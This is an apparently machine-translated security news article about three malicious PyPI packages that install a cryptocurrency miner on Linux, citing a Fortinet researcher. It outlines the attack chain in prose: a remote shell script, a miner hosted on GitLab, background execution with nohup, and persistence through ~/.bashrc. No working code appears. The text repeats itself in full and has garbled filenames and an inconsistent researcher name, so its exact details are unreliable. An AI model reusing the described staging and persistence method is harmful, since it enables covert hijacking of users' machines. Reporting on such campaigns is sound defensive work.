The sent Cossack is aimed at Linux systems. How soon will the victims of the attack notice something is wrong?
Three malicious packages capable of deploying a cryptocurrency miner on infected Linux devices were recently discovered in the open repository for PyPI developers. Packages named "modularseven", "driftme" and "catme" attracted the attention of security experts, being downloaded 431 times in the last month before being removed from the site.
Gabby Siong, a researcher at Fortinet, said that these packages deploy the CoinMiner executable on Linux devices when first used.
The malicious code is located in the "__ "file init__.py", which decodes and retrieves the first stage from a remote server is a shell script ("unmi.sh"), which loads the configuration file for mining, as well as the CoinMiner file hosted on GitLab.
The ELF binary file is then executed in the background using the "nohup" command, which ensures that the process continues to run after the session exits.
Siong notes that these packages, like the "culturestreak" from a previous similar campaign, hide the payload, thereby reducing the possibility of detecting malicious code by placing it on a remote URL. Later, the payload is gradually uploaded to the victim's computer to perform malicious activity.
The connection with the previous culturestreak package is also evident in the fact that the configuration file is hosted on the papiculo[.]net domain, and the mining executables are hosted in the public GitLab repository.
One of the notable innovations in the three detected packages is the addition of an additional stage that hides malicious intentions in the shell script, which helps to avoid detection by antivirus software.
In addition, Xiong points out that this malware inserts malicious commands into the "~/ " file.bashrc", which ensures the persistence and re-activation of malware on the user's device, effectively extending the period of its covert operation. This strategy promotes the most prolonged and covert use of a compromised device in the interests of intruders.
Three malicious packages capable of deploying a cryptocurrency miner on infected Linux devices were recently discovered in the open repository for PyPI developers. Packages named "modularseven", "driftme" and "catme" attracted the attention of security experts, being downloaded 431 times in the last month before being removed from the site.
Gabby Siong, a researcher at Fortinet, said that these packages deploy the CoinMiner executable on Linux devices when first used.
The malicious code is located in the "__ "file init__.py", which decodes and retrieves the first stage from a remote server is a shell script ("unmi.sh"), which loads the configuration file for mining, as well as the CoinMiner file hosted on GitLab.
The ELF binary file is then executed in the background using the "nohup" command, which ensures that the process continues to run after the session exits.
Siong notes that these packages, like the "culturestreak" from a previous similar campaign, hide the payload, thereby reducing the possibility of detecting malicious code by placing it on a remote URL. Later, the payload is gradually uploaded to the victim's computer to perform malicious activity.
The connection with the previous culturestreak package is also evident in the fact that the configuration file is hosted on the papiculo[.]net domain, and the mining executables are hosted in the public GitLab repository.
One of the notable innovations in the three detected packages is the addition of an additional stage that hides malicious intentions in the shell script, which helps to avoid detection by antivirus software.
In addition, Xiong points out that this malware inserts malicious commands into the "~/ " file.bashrc", which ensures the persistence and re-activation of malware on the user's device, effectively extending the period of its covert operation. This strategy promotes the most prolonged and covert use of a compromised device in the interests of intruders.
